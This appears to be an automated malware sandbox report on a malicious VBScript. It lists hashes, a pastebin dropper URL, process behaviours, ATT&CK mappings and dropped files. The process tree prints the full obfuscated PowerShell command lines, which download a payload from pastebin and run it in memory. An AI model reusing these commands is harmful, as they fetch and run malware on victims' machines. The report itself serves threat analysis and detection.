800b825fcf42dff45acf54bacae007176e930669987148d139693ff4fae6c807

General

Target

77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs
Size

213KB
MD5

2ee3aa9bc2da3fce27fe025356ae13b1
SHA1

d6c9f20fbfef8b1dca77e002c4ad2b9f7cad13c5
SHA256

77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1
SHA512

44d12a96f0c6ab16de52ebaae017f4e5e755831bfc9fe4704c560cb92f31f520737cf60949e89ea9e79bd744fa2065a0b29d90d4a033404e3fbdcf1c974b1f28
SSDEEP

3072:u5d6525555555e555555555555p5555+Ji555tp:R

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pastebin.com/raw/16APD4C6

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
4	320	powershell.exe
6	320	powershell.exe
8	320	powershell.exe
10	320	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1624	powershell.exe
320	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1624	powershell.exe
Token: SeDebugPrivilege	320	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 832 wrote to memory of 1624	832	WScript.exe	27
PID 832 wrote to memory of 1624	832	WScript.exe	27
PID 832 wrote to memory of 1624	832	WScript.exe	27
PID 1624 wrote to memory of 320	1624	powershell.exe	29
PID 1624 wrote to memory of 320	1624	powershell.exe	29
PID 1624 wrote to memory of 320	1624	powershell.exe	29

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:832
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J‱By‱HI‱agBo‱G8‱I‱‱9‱C‱‱Jw‱w‱DE‱Mg‱z‱DQ‱Jw‱7‱CQ‱bQB1‱Hc‱d‱Bo‱C‱‱PQ‱g‱Cc‱JQBw‱Ho‱QQBj‱E8‱ZwBJ‱G4‱TQBy‱CU‱Jw‱7‱Fs‱QgB5‱HQ‱ZQBb‱F0‱XQ‱g‱CQ‱YgB1‱G8‱ZgBj‱C‱‱PQ‱g‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBD‱G8‱bgB2‱GU‱cgB0‱F0‱Og‱6‱EY‱cgBv‱G0‱QgBh‱HM‱ZQ‱2‱DQ‱UwB0‱HI‱aQBu‱Gc‱K‱‱g‱Cg‱TgBl‱Hc‱LQBP‱GI‱agBl‱GM‱d‱‱g‱E4‱ZQB0‱C4‱VwBl‱GI‱QwBs‱Gk‱ZQBu‱HQ‱KQ‱u‱EQ‱bwB3‱G4‱b‱Bv‱GE‱Z‱BT‱HQ‱cgBp‱G4‱Zw‱o‱C‱‱K‱BO‱GU‱dw‱t‱E8‱YgBq‱GU‱YwB0‱C‱‱TgBl‱HQ‱LgBX‱GU‱YgBD‱Gw‱aQBl‱G4‱d‱‱p‱C4‱R‱Bv‱Hc‱bgBs‱G8‱YQBk‱FM‱d‱By‱Gk‱bgBn‱Cg‱JwBo‱HQ‱d‱Bw‱HM‱Og‱v‱C8‱c‱Bh‱HM‱d‱Bl‱GI‱aQBu‱C4‱YwBv‱G0‱LwBy‱GE‱dw‱v‱DE‱NgBB‱F‱‱R‱‱0‱EM‱Ng‱n‱Ck‱I‱‱p‱C‱‱KQ‱7‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBB‱H‱‱c‱BE‱G8‱bQBh‱Gk‱bgBd‱Do‱OgBD‱HU‱cgBy‱GU‱bgB0‱EQ‱bwBt‱GE‱aQBu‱C4‱T‱Bv‱GE‱Z‱‱o‱CQ‱YgB1‱G8‱ZgBj‱Ck‱LgBH‱GU‱d‱BU‱Hk‱c‱Bl‱Cg‱JwBD‱GQ‱VwBE‱GQ‱Qg‱u‱EQ‱SwBl‱FM‱dgBs‱Cc‱KQ‱u‱Ec‱ZQB0‱E0‱ZQB0‱Gg‱bwBk‱Cg‱JwBO‱G4‱SQBh‱FU‱cQ‱n‱Ck‱LgBJ‱G4‱dgBv‱Gs‱ZQ‱o‱CQ‱bgB1‱Gw‱b‱‱s‱C‱‱WwBv‱GI‱agBl‱GM‱d‱Bb‱F0‱XQ‱g‱Cg‱JwBs‱Gk‱NwBm‱G4‱aQB3‱Hk‱NgBi‱HE‱e‱‱v‱GQ‱YQBv‱Gw‱bgB3‱G8‱Z‱‱v‱G0‱bwBj‱C4‱bwBp‱GU‱d‱Bz‱GE‱c‱‱v‱C8‱OgBz‱H‱‱d‱B0‱Gg‱Jw‱g‱Cw‱I‱‱k‱G0‱dQB3‱HQ‱a‱‱g‱Cw‱I‱‱n‱GU‱eQBV‱Fc‱TQ‱n‱Cw‱I‱‱k‱HI‱cgBq‱Gg‱bw‱s‱C‱‱Jw‱x‱Cc‱L‱‱g‱Cc‱UgBv‱GQ‱YQ‱n‱C‱‱KQ‱p‱Ds‱';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('‱','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs');powershell -command $KByHL;
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1624
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$rrjho = '01234';$muwth = 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs';[Byte[]] $buofc = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/16APD4C6') ) );[system.AppDomain]::CurrentDomain.Load($buofc).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke($null, [object[]] ('li7fniwy6bqx/daolnwod/moc.oietsap//:sptth' , $muwth , 'eyUWM', $rrjho, '1', 'Roda' ));"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:320

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

1

T1102

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
16737edd9484f3e8e6396d424d76178b

SHA1
6ebb48d69bcaba389fc2f94c6c6b492edfeaf97d

SHA256
f79181177d47b10138d9daf72d78b6073e50baad4be0200c668d10d1ec29cb3e

SHA512
9c33750a465a67875c182ef9866d503c859717ef43d7dbc90cdf4f7e9f704ac254ee715f7adde7c8299f947c2127513aa820ace21cbdf6b66f0316e669dddb4a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab47EC.tmp

Filesize
62KB

MD5
3ac860860707baaf32469fa7cc7c0192

SHA1
c33c2acdaba0e6fa41fd2f00f186804722477639

SHA256
d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

SHA512
d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar48BA.tmp

Filesize
164KB

MD5
4ff65ad929cd9a367680e0e5b1c08166

SHA1
c0af0d4396bd1f15c45f39d3b849ba444233b3a2

SHA256
c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

SHA512
f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
6390cd84129860ce1d403d5224928aa5

SHA1
87c74c45f9010c6adb5a4a760f74ede61b08bd9e

SHA256
a508d6cd73a1ce65469c0ca6574fd549b7d765d2a23acdee5f6bde90263ec32d

SHA512
60c46f057617fe9eb78d5a7353447651193a0fed0d0a5eb5eb6999532c434975ad146cd6270e04d04ab00fa660eb7e4cede614b8a28129bb4cc173358d03a491

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NA8JUC94AKV8SU1RJZ6Q.temp

Filesize
7KB

MD5
6390cd84129860ce1d403d5224928aa5

SHA1
87c74c45f9010c6adb5a4a760f74ede61b08bd9e

SHA256
a508d6cd73a1ce65469c0ca6574fd549b7d765d2a23acdee5f6bde90263ec32d

SHA512
60c46f057617fe9eb78d5a7353447651193a0fed0d0a5eb5eb6999532c434975ad146cd6270e04d04ab00fa660eb7e4cede614b8a28129bb4cc173358d03a491

Download Submit
memory/320-69-0x0000000002630000-0x00000000026B0000-memory.dmp

Filesize
512KB

Download
memory/320-70-0x0000000002630000-0x00000000026B0000-memory.dmp

Filesize
512KB

Download
memory/320-71-0x0000000002630000-0x00000000026B0000-memory.dmp

Filesize
512KB

Download
memory/320-72-0x0000000002630000-0x00000000026B0000-memory.dmp

Filesize
512KB

Download
memory/320-134-0x0000000002760000-0x000000000276A000-memory.dmp

Filesize
40KB

Download
memory/1624-68-0x0000000002900000-0x0000000002980000-memory.dmp

Filesize
512KB

Download
memory/1624-63-0x0000000002900000-0x0000000002980000-memory.dmp

Filesize
512KB

Download
memory/1624-58-0x000000001B2E0000-0x000000001B5C2000-memory.dmp

Filesize
2.9MB

Download
memory/1624-61-0x0000000002900000-0x0000000002980000-memory.dmp

Filesize
512KB

Download
memory/1624-60-0x0000000002900000-0x0000000002980000-memory.dmp

Filesize
512KB

Download
memory/1624-59-0x0000000002360000-0x0000000002368000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing